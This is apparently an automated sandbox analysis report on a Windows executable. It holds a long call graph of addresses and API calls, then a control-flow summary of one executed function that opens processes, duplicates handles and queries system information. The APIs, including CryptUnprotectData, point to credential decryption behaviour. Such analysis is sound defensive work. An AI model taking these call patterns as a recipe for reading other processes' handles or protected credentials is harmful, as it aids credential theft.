39219 405313 39218->39219 39227 40b58d 27 API calls 39226->39227 39228 40b18c 39227->39228 39228->39189 39229->39193 39230->39197 39231->39201 39232->39205 39233->39209 39234->39213 39235->39217 39239 405220 39 API calls 39238->39239 39240 405369 39239->39240 39240->38951 39240->38952 39241->38954 39242->38958 39243->38955 39244->38952 39246 40440c FreeLibrary 39245->39246 39247 40436d 39246->39247 39248 40a804 8 API calls 39247->39248 39249 404377 39248->39249 39250 404383 39249->39250 39251 404405 39249->39251 39252 40b273 27 API calls 39250->39252 39251->38523 39251->38524 39251->38525 39253 40438d GetProcAddress 39252->39253 39254 40b273 27 API calls 39253->39254 39255 4043a7 GetProcAddress 39254->39255 39256 40b273 27 API calls 39255->39256 39257 4043ba GetProcAddress 39256->39257 39258 40b273 27 API calls 39257->39258 39259 4043ce GetProcAddress 39258->39259 39260 40b273 27 API calls 39259->39260 39261 4043e2 GetProcAddress 39260->39261 39262 4043f1 39261->39262 39263 4043f7 39262->39263 39264 40440c FreeLibrary 39262->39264 39263->39251 39264->39251 39266 404413 FreeLibrary 39265->39266 39267 40441e 39265->39267 39266->39267 39267->38540 39268->38536 39270 40447e 39269->39270 39271 40442e 39269->39271 39272 404485 CryptUnprotectData 39270->39272 39273 40449c 39270->39273 39274 40b2cc 27 API calls 39271->39274 39272->39273 39273->38536 39275 404438 39274->39275 39276 40a804 8 API calls 39275->39276 39277 40443e 39276->39277 39278 404445 39277->39278 39279 404467 39277->39279 39280 40b273 27 API calls 39278->39280 39279->39270 39282 404475 FreeLibrary 39279->39282 39281 40444f GetProcAddress 39280->39281 39281->39279 39283 404460 39281->39283 39282->39270 39283->39279 39285 4135f6 39284->39285 39286 4135eb FreeLibrary 39284->39286 39285->38543 39286->39285 39288 4449c4 39287->39288 39289 444a52 39287->39289 39290 40b2cc 27 API calls 39288->39290 39289->38560 39289->38561 39291 4449cb 39290->39291 39292 40a804 8 API calls 39291->39292 39293 4449d1 39292->39293 39294 40b273 27 API calls 39293->39294 39295 4449dc GetProcAddress 39294->39295 39296 40b273 27 API calls 39295->39296 39297 4449f3 GetProcAddress 39296->39297 39298 40b273 27 API calls 39297->39298 39299 444a04 GetProcAddress 39298->39299 39308->38571 39309->38571 39310->38571 39311->38571 39312->38562 39314 403a29 39313->39314 39328 403bed memset memset 39314->39328 39316 403ae7 39341 40b1ab free free 39316->39341 39318 403a3f memset 39322 403a2f 39318->39322 39319 403aef 39319->38579 39320 40a8d0 7 API calls 39320->39322 39321 409d1f 6 API calls 39321->39322 39322->39316 39322->39318 39322->39320 39322->39321 39323 409b98 GetFileAttributesW 39322->39323 39323->39322 39325 40a051 GetFileTime CloseHandle 39324->39325 39326 4039ca CompareFileTime 39324->39326 39325->39326 39326->38579 39327->38578 39329 414c2e 17 API calls 39328->39329 39330 403c38 39329->39330 39331 409719 2 API calls 39330->39331 39332 403c3f wcscat 39331->39332 39333 414c2e 17 API calls 39332->39333 39334 403c61 39333->39334 39335 409719 2 API calls 39334->39335 39336 403c68 wcscat 39335->39336 39342 403af5 39336->39342 39339 403af5 20 API calls 39340 403c95 39339->39340 39340->39322 39341->39319 39343 403b02 39342->39343 39344 40ae18 9 API calls 39343->39344 39352 403b37 39344->39352 39345 403bdb 39346 40aebe FindClose 39345->39346 39347 403be6 39346->39347 39347->39339 39348 40ae18 9 API calls 39348->39352 39349 40ae51 9 API calls 39349->39352 39350 40add4 wcscmp wcscmp 39350->39352 39351 40aebe FindClose 39351->39352 39352->39345 39352->39348 39352->39349 39352->39350 39352->39351 39353 40a8d0 7 API calls 39352->39353 39353->39352 39355 409d1f 6 API calls 39354->39355 39356 404190 39355->39356 39369 409b98 GetFileAttributesW 39356->39369 39358 40419c 39359 4041a7 6 API calls 39358->39359 39360 40435c 39358->39360 39361 40424f 39359->39361 39360->38605 39361->39360 39363 40425e memset 39361->39363 39365 409d1f 6 API calls 39361->39365 39366 40a8ab 9 API calls 39361->39366 39370 414842 39361->39370 39363->39361 39364 404296 wcscpy 39363->39364 39364->39361 39365->39361 39367 4042b6 memset memset _snwprintf wcscpy 39366->39367 39367->39361 39368->38603 39369->39358 39373 41443e 39370->39373 39372 414866 39372->39361 39374 41444b 39373->39374 39375 414451 39374->39375 39376 4144a3 GetPrivateProfileStringW 39374->39376 39377 414491 39375->39377 39378 414455 wcschr 39375->39378 39376->39372 39380 414495 WritePrivateProfileStringW 39377->39380 39378->39377 39379 414463 _snwprintf 39378->39379 39379->39380 39380->39372 39381->38609 39383 40b2cc 27 API calls 39382->39383 39384 409615 39383->39384 39385 409d1f 6 API calls 39384->39385 39386 409625 39385->39386 39411 409b98 GetFileAttributesW 39386->39411 39388 409634 39389 409648 39388->39389 39412 4091b8 memset 39388->39412 39391 40b2cc 27 API calls 39389->39391 39394 408801 39389->39394 39392 40965d 39391->39392 39393 409d1f 6 API calls 39392->39393 39395 40966d 39393->39395 39394->38612 39394->38639 39464 409b98 GetFileAttributesW 39395->39464 39397 40967c 39397->39394 39398 409681 39397->39398 39465 409529 72 API calls 39398->39465 39400 409690 39400->39394 39411->39388 39466 40a6e6 WideCharToMultiByte 39412->39466 39414 409202 39467 444432 39414->39467 39417 40b273 27 API calls 39418 409236 39417->39418 39513 438552 39418->39513 39444 40951d 39444->39389 39464->39397 39465->39400 39466->39414 39468 4438b5 11 API calls 39467->39468 39469 44444c 39468->39469 39470 409215 39469->39470 39563 415a6d 39469->39563 39470->39417 39470->39444 39472 4442e6 11 API calls 39474 44469e 39472->39474 39473 444486 39475 4444b9 memcpy 39473->39475 39512 4444a4 39473->39512 39474->39470 39477 443d90 111 API calls 39474->39477 39567 415258 39475->39567 39477->39470 39478 444524 39479 444541 39478->39479 39480 44452a 39478->39480 39570 444316 39479->39570 39481 416935 16 API calls 39480->39481 39481->39512 39512->39472 39684 438460 39513->39684 39564 415a77 39563->39564 39565 415a8d 39564->39565 39566 415a7e memset 39564->39566 39565->39473 39566->39565 39568 4438b5 11 API calls 39567->39568 39569 41525d 39568->39569 39569->39478 39571 444328 39570->39571 39696 41703f 39684->39696 39686 43847a 39687 43848a 39686->39687 39688 43847e 39686->39688 39703 438270 39687->39703 39733 4446ea 11 API calls 39688->39733 39695 438488 39697 417044 39696->39697 39698 41705c 39696->39698 39700 416760 11 API calls 39697->39700 39702 417055 39697->39702 39699 417075 39698->39699 39701 41707a 11 API calls 39698->39701 39699->39686 39700->39702 39701->39697 39702->39686 39704 415a91 memset 39703->39704 39733->39695 39834 413f4f 39807->39834 39810 413f37 K32GetModuleFileNameExW 39811 413f4a 39810->39811 39811->38672 39813 413969 wcscpy 39812->39813 39814 41396c wcschr 39812->39814 39824 413a3a 39813->39824 39814->39813 39816 41398e 39814->39816 39839 4097f7 wcslen wcslen _memicmp 39816->39839 39818 41399a 39819 4139a4 memset 39818->39819 39820 4139e6 39818->39820 39840 409dd5 GetWindowsDirectoryW wcscpy 39819->39840 39822 413a31 wcscpy 39820->39822 39823 4139ec memset 39820->39823 39822->39824 39841 409dd5 GetWindowsDirectoryW wcscpy 39823->39841 39824->38672 39825 4139c9 wcscpy wcscat 39825->39824 39827 413a11 memcpy wcscat 39827->39824 39829 413cb0 GetModuleHandleW 39828->39829 39830 413cda 39828->39830 39829->39830 39833 413cbf GetProcAddress 39829->39833 39831 413ce3 GetProcessTimes 39830->39831 39832 413cf6 39830->39832 39831->38674 39832->38674 39833->39830 39835 413f2f 39834->39835 39836 413f54 39834->39836 39835->39810 39835->39811 39837 40a804 8 API calls 39836->39837 39838 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39837->39838 39838->39835 39839->39818 39840->39825 39841->39827 39842->38694 39843->38717 39845 409cf9 GetVersionExW 39844->39845 39846 409d0a 39844->39846 39845->39846 39846->38723 39846->38729 39847->38730 39848->38734 39849->38736 39850->38802 39852 40bba5 39851->39852 39896 40cc26 39852->39896 39855 40bd4b 39917 40cc0c 39855->39917 39860 40b2cc 27 API calls 39861 40bbef 39860->39861 39924 40ccf0 _wcsicmp 39861->39924 39863 40bbf5 39863->39855 39925 40ccb4 6 API calls 39863->39925 39865 40bc26 39866 40cf04 17 API calls 39865->39866 39867 40bc2e 39866->39867 39868 40bd43 39867->39868 39869 40b2cc 27 API calls 39867->39869 39870 40cc0c 4 API calls 39868->39870 39871 40bc40 39869->39871 39870->39855 39926 40ccf0 _wcsicmp 39871->39926 39873 40bc46 39873->39868 39874 40bc61 memset memset WideCharToMultiByte 39873->39874 39927 40103c strlen 39874->39927 39876 40bcc0 39877 40b273 27 API calls 39876->39877 39878 40bcd0 memcmp 39877->39878 39878->39868 39879 40bce2 39878->39879 39880 404423 38 API calls 39879->39880 39881 40bd10 39880->39881 39881->39868 39882 40bd3a LocalFree 39881->39882 39883 40bd1f memcpy 39881->39883 39882->39868 39883->39882 39884->38817 39885->38854 39886->38854 39887->38854 39888->38854 39889->38854 39890->38854 39891->38854 39892->38854 39893->38854 39894->38829 39895->38851 39928 4096c3 CreateFileW 39896->39928 39898 40cc34 39899 40cc3d GetFileSize 39898->39899 39907 40bbca 39898->39907 39900 40afcf 2 API calls 39899->39900 39901 40cc64 39900->39901 39929 40a2ef ReadFile 39901->39929 39903 40cc71 39930 40ab4a MultiByteToWideChar 39903->39930 39905 40cc95 CloseHandle 39906 40b04b ??3@YAXPAX 39905->39906 39906->39907 39907->39855 39908 40cf04 39907->39908 39909 40b633 free 39908->39909 39910 40cf14 39909->39910 39936 40b1ab free free 39910->39936 39912 40cf1b 39913 40cfef 39912->39913 39916 40bbdd 39912->39916 39937 40cd4b 39912->39937 39915 40cd4b 14 API calls 39913->39915 39915->39916 39916->39855 39916->39860 39918 40b633 free 39917->39918 39919 40cc15 39918->39919 39920 40aa04 free 39919->39920 39921 40cc1d 39920->39921 39978 40b1ab free free 39921->39978 39923 40b7d4 memset CreateFileW 39923->38809 39923->38810 39924->39863 39925->39865 39926->39873 39927->39876 39928->39898 39929->39903 39931 40ab93 39930->39931 39932 40ab6b 39930->39932 39931->39905 39933 40a9ce 4 API calls 39932->39933 39934 40ab74 39933->39934 39935 40ab7c MultiByteToWideChar 39934->39935 39935->39931 39936->39912 39938 40cd7b 39937->39938 39939 40aa29 6 API calls 39938->39939 39943 40cd89 39939->39943 39940 40cef5 39941 40aa04 free 39940->39941 39942 40cefd 39941->39942 39942->39912 39943->39940 39944 40aa29 6 API calls 39943->39944 39945 40ce1d 39944->39945 39946 40aa29 6 API calls 39945->39946 39947 40ce3e 39946->39947 39948 40ce6a 39947->39948 39971 40abb7 wcslen memmove 39947->39971 39949 40ce9f 39948->39949 39974 40abb7 wcslen memmove 39948->39974 39952 40a8d0 7 API calls 39949->39952 39955 40ceb5 39952->39955 39953 40ce56 39972 40aa71 wcslen 39953->39972 39954 40ce8b 39975 40aa71 wcslen 39954->39975 39959 40a8d0 7 API calls 39955->39959 39958 40ce5e 39973 40abb7 wcslen memmove 39958->39973 39962 40cecb 39959->39962 39960 40ce93 39976 40abb7 wcslen memmove 39960->39976 39977 40d00b malloc memcpy free free 39962->39977 39965 40cedd 39966 40aa04 free 39965->39966 39967 40cee5 39966->39967 39968 40aa04 free 39967->39968 39969 40ceed 39968->39969 39970 40aa04 free 39969->39970 39970->39940 39971->39953 39972->39958 39973->39948 39974->39954 39975->39960 39976->39949 39977->39965 39978->39923 39979->38869 39980->38877 39981 442774 39982 442799 39981->39982 39983 44277b 39981->39983 40006 42bf4c 14 API calls 39982->40006 39998 42b63e 39983->39998 39987 4427a5 40007 42bfcf memcpy 39987->40007 39990 4427ba 40008 42c00a 11 API calls 39990->40008 39992 441897 39993 4418ea 39992->39993 39994 442bd4 39992->39994 39995 4418e2 39992->39995 39994->39993 40010 441409 memset 39994->40010 39995->39993 40009 4414a9 12 API calls 39995->40009 40011 42b4ec 39998->40011 40000 42b64c 40017 42b5e4 40000->40017 40002 42b65e 40003 42b66d 40002->40003 40024 42b3c6 11 API calls 40002->40024 40005 42b1b5 17 API calls 40003->40005 40005->39982 40006->39987 40007->39990 40008->39992 40009->39993 40010->39994 40014 42b4ff 40011->40014 40012 415a91 memset 40013 42b52c 40012->40013 40015 42b553 memcpy 40013->40015 40016 42b545 40013->40016 40014->40012 40015->40016 40016->40000 40018 42b5eb 40017->40018 40022 42b604 40017->40022 40025 42b896 memset 40018->40025 40020 42b5f5 40026 42b896 memset 40020->40026 40022->40002 40023 42b5ff 40023->40002 40024->40003 40025->40020 40026->40023 40027 4147f3 40030 414561 40027->40030 40029 414813 40031 41456d 40030->40031 40032 41457f GetPrivateProfileIntW 40030->40032 40035 4143f1 memset _itow WritePrivateProfileStringW 40031->40035 40032->40029 40034 41457a 40034->40029 40035->40034 40036 44def7 40037 44df07 40036->40037 40038 44df00 ??3@YAXPAX 40036->40038 40039 44df17 40037->40039 40040 44df10 ??3@YAXPAX 40037->40040 40038->40037 40041 44df27 40039->40041 40042 44df20 ??3@YAXPAX 40039->40042 40040->40039 40043 44df37 40041->40043 40044 44df30 ??3@YAXPAX 40041->40044 40042->40041 40044->40043 40045 4148b6 FindResourceW 40046 4148cf SizeofResource 40045->40046 40049 4148f9 40045->40049 40047 4148e0 LoadResource 40046->40047 40046->40049 40048 4148ee LockResource 40047->40048 40047->40049 40048->40049 40050 441b3f 40060 43a9f6 40050->40060 40052 441b61 40233 4386af memset 40052->40233 40054 44189a 40055 442bd4 40054->40055 40056 4418e2 40054->40056 40057 4418ea 40055->40057 40235 441409 memset 40055->40235 40056->40057 40234 4414a9 12 API calls 40056->40234 40061 43aa20 40060->40061 40062 43aadf 40060->40062 40061->40062 40063 43aa34 memset 40061->40063 40062->40052 40064 43aa56 40063->40064 40065 43aa4d 40063->40065 40236 43a6e7 40064->40236 40244 42c02e memset 40065->40244 40070 43aad3 40246 4169a7 11 API calls 40070->40246 40071 43aaae 40071->40062 40071->40070 40086 43aae5 40071->40086 40073 43ac18 40075 43ac47 40073->40075 40248 42bbd5 memcpy memcpy memcpy memset memcpy 40073->40248 40076 43aca8 40075->40076 40249 438eed 16 API calls 40075->40249 40080 43acd5 40076->40080 40251 4233ae 11 API calls 40076->40251 40079 43ac87 40250 4233c5 16 API calls 40079->40250 40252 423426 11 API calls 40080->40252 40084 43ace1 40253 439811 164 API calls 40084->40253 40085 43a9f6 162 API calls 40085->40086 40086->40062 40086->40073 40086->40085 40247 439bbb 22 API calls 40086->40247 40088 43acfd 40094 43ad2c 40088->40094 40254 438eed 16 API calls 40088->40254 40090 43ad19 40255 4233c5 16 API calls 40090->40255 40092 43ad58 40256 44081d 164 API calls 40092->40256 40094->40092 40096 43add9 40094->40096 40096->40096 40260 423426 11 API calls 40096->40260 40097 43ae3a memset 40098 43ae73 40097->40098 40261 42e1c0 148 API calls 40098->40261 40099 43adab 40258 438c4e 164 API calls 40099->40258 40101 43ad6c 40101->40062 40101->40099 40257 42370b memset memcpy memset 40101->40257 40103 43ae96 40262 42e1c0 148 API calls 40103->40262 40105 43adcc 40259 440f84 12 API calls 40105->40259 40108 43aea8 40109 43aec1 40108->40109 40263 42e199 148 API calls 40108->40263 40111 43af00 40109->40111 40264 42e1c0 148 API calls 40109->40264 40111->40062 40114 43af1a 40111->40114 40115 43b3d9 40111->40115 40265 438eed 16 API calls 40114->40265 40120 43b3f6 40115->40120 40127 43b4c8 40115->40127 40117 43b60f 40117->40062 40324 4393a5 17 API calls 40117->40324 40118 43af2f 40266 4233c5 16 API calls 40118->40266 40306 432878 12 API calls 40120->40306 40122 43af51 40267 423426 11 API calls 40122->40267 40125 43af7d 40268 423426 11 API calls 40125->40268 40126 43b4f2 40313 43a76c 21 API calls 40126->40313 40127->40126 40312 42bbd5 memcpy memcpy memcpy memset memcpy 40127->40312 40131 43b529 40314 44081d 164 API calls 40131->40314 40132 43b428 40160 43b462 40132->40160 40307 432b60 16 API calls 40132->40307 40133 43af94 40269 423330 11 API calls 40133->40269 40137 43b47e 40146 43b497 40137->40146 40309 42374a memcpy memset memcpy memcpy memcpy 40137->40309 40138 43b544 40148 43b55c 40138->40148 40315 42c02e memset 40138->40315 40139 43afca 40270 423330 11 API calls 40139->40270 40144 43afdb 40271 4233ae 11 API calls 40144->40271 40310 4233ae 11 API calls 40146->40310 40147 43b4b1 40311 423399 11 API calls 40147->40311 40316 43a87a 164 API calls 40148->40316 40150 43b56c 40153 43b58a 40150->40153 40317 423330 11 API calls 40150->40317 40152 43afee 40272 44081d 164 API calls 40152->40272 40318 440f84 12 API calls 40153->40318 40155 43b4c1 40320 42db80 164 API calls 40155->40320 40159 43b592 40319 43a82f 16 API calls 40159->40319 40308 423330 11 API calls 40160->40308 40163 43b5b4 40321 438c4e 164 API calls 40163->40321 40165 43b5cf 40322 42c02e memset 40165->40322 40167 43b005 40167->40062 40172 43b01f 40167->40172 40273 42d836 164 API calls 40167->40273 40168 43b1ef 40283 4233c5 16 API calls 40168->40283 40170 43b212 40284 423330 11 API calls 40170->40284 40172->40168 40281 423330 11 API calls 40172->40281 40282 42d71d 164 API calls 40172->40282 40174 43add4 40174->40117 40323 438f86 16 API calls 40174->40323 40177 43b087 40274 4233ae 11 API calls 40177->40274 40178 43b22a 40285 42ccb5 11 API calls 40178->40285 40181 43b10f 40277 423330 11 API calls 40181->40277 40182 43b23f 40286 4233ae 11 API calls 40182->40286 40184 43b257 40287 4233ae 11 API calls 40184->40287 40188 43b129 40278 4233ae 11 API calls 40188->40278 40189 43b26e 40288 4233ae 11 API calls 40189->40288 40191 43b09a 40191->40181 40275 42cc15 19 API calls 40191->40275 40276 4233ae 11 API calls 40191->40276 40193 43b282 40289 43a87a 164 API calls 40193->40289 40195 43b13c 40279 440f84 12 API calls 40195->40279 40197 43b29d 40290 423330 11 API calls 40197->40290 40200 43b15f 40280 4233ae 11 API calls 40200->40280 40201 43b2af 40203 43b2b8 40201->40203 40204 43b2ce 40201->40204 40291 4233ae 11 API calls 40203->40291 40292 440f84 12 API calls 40204->40292 40207 43b2c9 40294 4233ae 11 API calls 40207->40294 40208 43b2da 40293 42370b memset memcpy memset 40208->40293 40211 43b2f9 40295 423330 11 API calls 40211->40295 40213 43b30b 40296 423330 11 API calls 40213->40296 40215 43b325 40297 423399 11 API calls 40215->40297 40217 43b332 40298 4233ae 11 API calls 40217->40298 40219 43b354 40299 423399 11 API calls 40219->40299 40221 43b364 40300 43a82f 16 API calls 40221->40300 40223 43b370 40301 42db80 164 API calls 40223->40301 40225 43b380 40302 438c4e 164 API calls 40225->40302 40227 43b39e 40303 423399 11 API calls 40227->40303 40229 43b3ae 40304 43a76c 21 API calls 40229->40304 40231 43b3c3 40305 423399 11 API calls 40231->40305 40233->40054 40234->40057 40235->40055 40237 43a6f5 40236->40237 40238 43a765 40236->40238 40237->40238 40325 42a115 40237->40325 40238->40062 40245 4397fd memset 40238->40245 40242 43a73d 40242->40238 40243 42a115 148 API calls 40242->40243 40243->40238 40244->40064 40245->40071 40246->40062 40247->40086 40248->40075 40249->40079 40250->40076 40251->40080 40252->40084 40253->40088 40254->40090 40255->40094 40256->40101 40257->40099 40258->40105 40259->40174 40260->40097 40261->40103 40262->40108 40263->40109 40264->40109 40265->40118 40266->40122 40267->40125 40268->40133 40269->40139 40270->40144 40271->40152 40272->40167 40273->40177 40274->40191 40275->40191 40276->40191 40277->40188 40278->40195 40279->40200 40280->40172 40281->40172 40282->40172 40283->40170 40284->40178 40285->40182 40286->40184 40287->40189 40288->40193 40289->40197 40290->40201 40291->40207 40292->40208 40293->40207 40294->40211 40295->40213 40296->40215 40297->40217 40298->40219 40299->40221 40300->40223 40301->40225 40302->40227 40303->40229 40304->40231 40305->40174 40306->40132 40307->40160 40308->40137 40309->40146 40310->40147 40311->40155 40312->40126 40313->40131 40314->40138 40315->40148 40316->40150 40317->40153 40318->40159 40319->40155 40320->40163 40321->40165 40322->40174 40323->40117 40324->40062 40326 42a175 40325->40326 40328 42a122 40325->40328 40326->40238 40331 42b13b 148 API calls 40326->40331 40328->40326 40329 42a115 148 API calls 40328->40329 40332 43a174 40328->40332 40356 42a0a8 148 API calls 40328->40356 40329->40328 40331->40242 40346 43a196 40332->40346 40347 43a19e 40332->40347 40333 43a306 40333->40346 40372 4388c4 14 API calls 40333->40372 40336 42a115 148 API calls 40336->40347 40337 415a91 memset 40337->40347 40338 43a642 40338->40346 40375 4169a7 11 API calls 40338->40375 40342 43a635 40374 42c02e memset 40342->40374 40346->40328 40347->40333 40347->40336 40347->40337 40347->40346 40357 42ff8c 40347->40357 40365 4165ff 40347->40365 40368 439504 13 API calls 40347->40368 40369 4312d0 148 API calls 40347->40369 40370 42be4c memcpy memcpy memcpy memset memcpy 40347->40370 40371 43a121 11 API calls 40347->40371 40349 43a325 40349->40338 40349->40342 40349->40346 40350 4169a7 11 API calls 40349->40350 40351 42b5b5 memset memcpy 40349->40351 40352 42bf4c 14 API calls 40349->40352 40353 42b63e 14 API calls 40349->40353 40355 4165ff 11 API calls 40349->40355 40373 42bfcf memcpy 40349->40373 40350->40349 40351->40349 40352->40349 40353->40349 40355->40349 40356->40328 40376 43817e 40357->40376 40359 42ff99 40360 42ffe3 40359->40360 40361 42ffd0 40359->40361 40364 42ff9d 40359->40364 40381 4169a7 11 API calls 40360->40381 40380 4169a7 11 API calls 40361->40380 40364->40347 40366 4165a0 11 API calls 40365->40366 40367 41660d 40366->40367 40367->40347 40368->40347 40369->40347 40370->40347 40371->40347 40372->40349 40373->40349 40374->40338 40375->40346 40377 438187 40376->40377 40379 438192 40376->40379 40382 4380f6 40377->40382 40379->40359 40380->40364 40381->40364 40384 43811f 40382->40384 40383 438164 40383->40379 40384->40383 40386 4300e8 3 API calls 40384->40386 40387 437e5e 40384->40387 40386->40384 40410 437d3c 40387->40410 40389 437eb3 40389->40384 40390 437ea9 40390->40389 40396 437f22 40390->40396 40425 41f432 40390->40425 40393 437f06 40473 415c56 11 API calls 40393->40473 40395 437f95 40474 415c56 11 API calls 40395->40474 40397 437f7f 40396->40397 40398 432d4e 3 API calls 40396->40398 40397->40395 40400 43802b 40397->40400 40398->40397 40401 4165ff 11 API calls 40400->40401 40402 438054 40401->40402 40436 437371 40402->40436 40405 43806b 40406 438094 40405->40406 40475 42f50e 139 API calls 40405->40475 40408 437fa3 40406->40408 40409 4300e8 3 API calls 40406->40409 40408->40389 40476 41f638 104 API calls 40408->40476 40409->40408 40411 437d69 40410->40411 40414 437d80 40410->40414 40477 437ccb 11 API calls 40411->40477 40413 437d76 40413->40390 40414->40413 40415 437da3 40414->40415 40416 437d90 40414->40416 40418 438460 134 API calls 40415->40418 40416->40413 40481 437ccb 11 API calls 40416->40481 40421 437dcb 40418->40421 40420 437de8 40480 424f26 123 API calls 40420->40480 40421->40420 40478 444283 13 API calls 40421->40478 40423 437dfc 40479 437ccb 11 API calls 40423->40479 40426 41f54d 40425->40426 40432 41f44f 40425->40432 40427 41f466 40426->40427 40511 41c635 memset memset 40426->40511 40427->40393 40427->40396 40432->40427 40434 41f50b 40432->40434 40482 41f1a5 40432->40482 40507 41c06f memcmp 40432->40507 40508 41f3b1 90 API calls 40432->40508 40509 41f398 86 API calls 40432->40509 40434->40426 40434->40427 40510 41c295 86 API calls 40434->40510 40437 41703f 11 API calls 40436->40437 40438 437399 40437->40438 40439 43739d 40438->40439 40442 4373ac 40438->40442 40513 4446ea 11 API calls 40439->40513 40441 4373a7 40441->40405 40443 416935 16 API calls 40442->40443 40444 4373ca 40443->40444 40446 438460 134 API calls 40444->40446 40450 4251c4 137 API calls 40444->40450 40454 415a91 memset 40444->40454 40457 43758f 40444->40457 40469 437584 40444->40469 40472 437d3c 135 API calls 40444->40472 40512 415308 free 40444->40512 40514 425433 13 API calls 40444->40514 40515 425413 17 API calls 40444->40515 40516 42533e 16 API calls 40444->40516 40517 42538f 16 API calls 40444->40517 40518 42453e 123 API calls 40444->40518 40445 4375bc 40448 415c7d 16 API calls 40445->40448 40446->40444 40449 4375d2 40448->40449 40449->40441 40451 4442e6 11 API calls 40449->40451 40450->40444 40452 4375e2 40451->40452 40452->40441 40521 444283 13 API calls 40452->40521 40454->40444 40519 42453e 123 API calls 40457->40519 40458 4375f4 40463 437620 40458->40463 40464 43760b 40458->40464 40462 43759f 40465 416935 16 API calls 40462->40465 40467 416935 16 API calls 40463->40467 40522 444283 13 API calls 40464->40522 40465->40469 40467->40441 40469->40445 40520 42453e 123 API calls 40469->40520 40470 437612 memcpy 40470->40441 40472->40444 40473->40389 40474->40408 40475->40406 40476->40389 40477->40413 40478->40423 40479->40420 40480->40413 40481->40413 40483 41bc3b 101 API calls 40482->40483 40484 41f1b4 40483->40484 40485 41edad 86 API calls 40484->40485 40492 41f282 40484->40492 40486 41f1cb 40485->40486 40487 41f1f5 memcmp 40486->40487 40488 41f20e 40486->40488 40486->40492 40487->40488 40489 41f21b memcmp 40488->40489 40488->40492 40490 41f326 40489->40490 40493 41f23d 40489->40493 40491 41ee6b 86 API calls 40490->40491 40490->40492 40491->40492 40492->40432 40493->40490 40494 41f28e memcmp 40493->40494 40496 41c8df 56 API calls 40493->40496 40494->40490 40495 41f2a9 40494->40495 40495->40490 40498 41f308 40495->40498 40499 41f2d8 40495->40499 40497 41f269 40496->40497 40497->40490 40500 41f287 40497->40500 40501 41f27a 40497->40501 40498->40490 40505 4446ce 11 API calls 40498->40505 40502 41ee6b 86 API calls 40499->40502 40500->40494 40503 41ee6b 86 API calls 40501->40503 40504 41f2e0 40502->40504 40503->40492 40506 41b1ca memset 40504->40506 40505->40490 40506->40492 40507->40432 40508->40432 40509->40432 40510->40426 40511->40427 40512->40444 40513->40441 40514->40444 40515->40444 40516->40444 40517->40444 40518->40444 40519->40462 40520->40445 40521->40458 40522->40470 40523 441819 40526 430737 40523->40526 40525 441825 40527 430756 40526->40527 40539 43076d 40526->40539 40528 430774 40527->40528 40529 43075f 40527->40529 40541 43034a memcpy 40528->40541 40540 4169a7 11 API calls 40529->40540 40532 4307ce 40534 430819 memset 40532->40534 40535 415b2c 11 API calls 40532->40535 40533 43077e 40533->40532 40537 4307fa 40533->40537 40533->40539 40534->40539 40536 4307e9 40535->40536 40536->40534 40536->40539 40542 4169a7 11 API calls 40537->40542 40539->40525 40540->40539 40541->40533 40542->40539 40543 441939 40568 441247 40543->40568 40546 4418ea 40547 441897 40549 442bd4 40547->40549 40550 4418e2 40547->40550 40549->40546 40572 441409 memset 40549->40572 40550->40546 40571 4414a9 12 API calls 40550->40571 40553 4308a4 40554 4308e4 40553->40554 40555 4308bc 40553->40555 40578 42b896 memset 40554->40578 40573 42c0c8 148 API calls 40555->40573 40558 4308d3 40560 4308e8 40558->40560 40561 4308d8 40558->40561 40559 430931 40559->40547 40575 42b896 memset 40560->40575 40574 4169a7 11 API calls 40561->40574 40564 4308f3 40576 42bbbe memcpy memcpy memcpy memset memcpy 40564->40576 40566 4308ff 40577 415c23 memcpy 40566->40577 40569 42b63e 14 API calls 40568->40569 40570 441259 40569->40570 40570->40546 40570->40547 40570->40553 40571->40546 40572->40549 40573->40558 40574->40554 40575->40564 40576->40566 40577->40554 40578->40559 40579 41493c EnumResourceNamesW

                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                      Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
